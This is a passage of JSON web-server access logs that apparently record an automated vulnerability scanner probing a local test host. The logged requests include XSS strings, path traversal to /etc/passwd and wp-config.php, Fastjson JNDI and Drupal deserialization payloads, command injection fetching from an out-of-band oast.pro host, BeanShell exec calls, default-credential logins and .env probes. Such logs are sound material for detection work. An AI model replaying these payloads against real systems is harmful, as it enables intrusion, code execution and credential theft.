+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.jenkins.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"j_username=app&j_password=passw0rd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ibmmq/console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/ibmmq/console/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KBxbutHlZSAA6SSDpHyamWjMt?cmd=id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../conf/config.properties HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"{\x0D\x0A \x22b\x22:{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca28bc0smpvbbtig07h0h9b54ghyurwda.oast.pro/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/read_body.php?mailbox=/etc/passwd&passed_id=1& HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.999","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.travis.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"j_username=mqadmin&j_password=mqadmin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ibmmq/console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1/ibmmq/console/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2Fca28bc0smpvbbtig07h0gqihn6j1n1m7h.oast.pro%3B%60%3B%23&password=asd&lang_select=en","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webpack.config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /contrib/acog/print_form.php?formname=../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"bsh.script=exec(\x22id\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"{ \x22link\x22: [ { \x22value\x22: \x22link\x22, \x22options\x22: \x22O:24:\x5C\x22GuzzleHttp\x5C\x5CPsr7\x5C\x5CFnStream\x5C\x22:2:{s:33:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CPsr7\x5C\x5CFnStream\x5Cu0000methods\x5C\x22;a:1:{s:5:\x5C\x22close\x5C\x22;a:2:{i:0;O:23:\x5C\x22GuzzleHttp\x5C\x5CHandlerStack\x5C\x22:3:{s:32:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000handler\x5C\x22;s:2:\x5C\x22id\x5C\x22;s:30:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000stack\x5C\x22;a:1:{i:0;a:1:{i:0;s:6:\x5C\x22system\x5C\x22;}}s:31:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000cached\x5C\x22;b:0;}i:1;s:7:\x5C\x22resolve\x5C\x22;}}s:9:\x5C\x22_fn_close\x5C\x22;a:2:{i:0;r:4;i:1;s:7:\x5C\x22resolve\x5C\x22;}}\x22 } ], \x22_links\x22: { \x22type\x22: { \x22href\x22: \x22http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default\x22 } } }","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /node/1?_format=hal_json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca28bc0smpvbbtig07h0bexeddmfz7oht.oast.pro/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/admin/common/clearcache?previousUrl=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/123contactform-for-wordpress/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/status/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /deltaweb/hmi_login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"bsh.script=exec(\x22ipconfig\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /global-protect/login.esp?user=j%22;-alert(1)-%22x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /update.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=download_report&report=users&status=all HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"yuzo_related_post_css_and_style=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /versa/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/database/selector/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hosts HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"__csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /core/config/databases.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 